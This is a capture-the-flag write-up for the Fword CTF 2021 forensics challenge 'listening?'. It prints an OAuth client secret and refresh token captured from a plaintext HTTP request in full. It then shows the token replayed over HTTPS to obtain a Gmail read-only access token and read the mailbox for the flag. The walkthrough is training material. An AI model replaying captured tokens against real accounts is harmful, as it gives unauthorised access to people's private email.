listening? was one of the forensics challenges in Fword ctf 2021.
The challenge description reads:
1
2
3
How Deep Can You Possibly Dig?
Flag Format: FwordCTF{....}
We are given a pcap file challenge.pcap
.
It is a small trace that lasts almost 9 seconds and contains 66 packets, including DNS, ARP and ICMP traffic and a single HTTP connection. Let’s analyze this one:
1
2
3
4
5
6
7
8
9
REQUEST - packet 19
POST /token HTTP/1.1
Host: oauth2.googleapis.com
Content-length: 269
content-type: application/x-www-form-urlencoded
user-agent: google-oauth-playground
client_secret=AER8VvrXuFfYfqjhidcekAM0&grant_type=refresh_token&refresh_token=1%2F%2F044y6gZR87Kl0CgYIARAAGAQSNwF-L9IrkAFpIJPMhiGY0OPJpo5RiA5_7R-mHH-kuHwCMUeFL2JqxevGr23oBJmaxdnrD52t3X4&client_id=1097638694557-3v745luessc34bkoiqkf8tndqgvbqjpm.apps.googleusercontent.com&[email protected]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
RESPONSE - packet 33
HTTP/1.1 403 Forbidden
Vary: X-Origin
Vary: Referer
Content-Type: application/json; charset=UTF-8
Date: Fri, 27 Aug 2021 18:24:31 GMT
Server: scaffolding on HTTPServer2
Cache-Control: private
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Accept-Ranges: none
Vary: Origin,Accept-Encoding
Transfer-Encoding: chunked
{
"error": {
"code": 403,
"message": "SSL is required to perform this operation.",
"status": "PERMISSION_DENIED"
}
}
It looks like the server was expecting a connection over HTTPS instead of HTTP, so let’s try to reproduce the POST request to port 443:
1
2
3
4
5
6
7
https://oauth2.googleapis.com/token
client_secret=AER8VvrXuFfYfqjhidcekAM0
grant_type=refresh_token
refresh_token=1//044y6gZR87Kl0CgYIARAAGAQSNwF-L9IrkAFpIJPMhiGY0OPJpo5RiA5_7R-mHH-kuHwCMUeFL2JqxevGr23oBJmaxdnrD52t3X4
client_id=1097638694557-3v745luessc34bkoiqkf8tndqgvbqjpm.apps.googleusercontent.com
[email protected]
This gives us the Access Token we need to solve the challenge.
1
2
3
4
5
6
{
"access_token": "ya29.a0ARrdaM9n2idPYv8nnNVnR5gqL_T47o0Q0XKYvIbB8IEzgHo8Ykus3fi2K5vc5A0xMU_liwsiFVEAJQKbQrxEIMAXTRO2HYUG_aNFu9NhmZQwQTH-v4-rxQ3qP7XowFYTCzyXf7cfj-E8q-TGZ-y_uW9JONuMQA",
"expires_in": 3599,
"scope": "https://www.googleapis.com/auth/gmail.readonly",
"token_type": "Bearer"
}
Now we can send a GET request to https://gmail.googleapis.com/gmail/v1/users/{userId}/messages/
in order to get the ID of the the messages in the user’s mailbox, specifying the userId ([email protected]
) and using the token retrieved before.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
{
"messages": [
{
"id": "17b896f6726974e0",
"threadId": "17b896f6726974e0"
},
{
"id": "17b88c3eac07ae5e",
"threadId": "17b88c3eac07ae5e"
},
{
"id": "17b87ba8cb2223ae",
"threadId": "17b87ba8cb2223ae"
},
{
"id": "17b87ba704382ed8",
"threadId": "17b87ba704382ed8"
},
{
"id": "17b7e34d7c2c32ab",
"threadId": "17b7e34d7c2c32ab"
},
{
"id": "17b7e18804f074a3",
"threadId": "17b7e18804f074a3"
},
{
"id": "17b7e09ebbf28050",
"threadId": "17b7e09ebbf28050"
},
{
"id": "17b7da2b72dab49b",
"threadId": "17b7da203f30dacd"
},
{
"id": "17b7da27c90003dc",
"threadId": "17b7da27c90003dc"
},
{
"id": "17b7da203f30dacd",
"threadId": "17b7da203f30dacd"
},
{
"id": "17b7d91845068c5e",
"threadId": "17b7d91845068c5e"
},
{
"id": "17b7d90a62a92cf7",
"threadId": "17b7d90a62a92cf7"
},
{
"id": "17b7d8fc93407e79",
"threadId": "17b7d8fc93407e79"
},
{
"id": "17b7d8ea201ede87",
"threadId": "17b7d8d5f2e72c65"
},
{
"id": "17b7d8dd6b16b6a1",
"threadId": "17b7d8d5f2e72c65"
},
{
"id": "17b7d8d5f2e72c65",
"threadId": "17b7d8d5f2e72c65"
},
{
"id": "17b7d8c607a05e7e",
"threadId": "17b7d8c607a05e7e"
},
{
"id": "17b7d85d21fc05ba",
"threadId": "17b7d85d21fc05ba"
},
{
"id": "17b7d762e4b0777e",
"threadId": "17b7d762e4b0777e"
}
],
"resultSizeEstimate": 19
}
We can now list each message by querying https://gmail.googleapis.com/gmail/v1/users/{userId}/messages/{id}
.
The flag is found in email ID 17b7d85d21fc05ba:
FwordCTF{email_forensics_is_interesting_73489nn7n4891}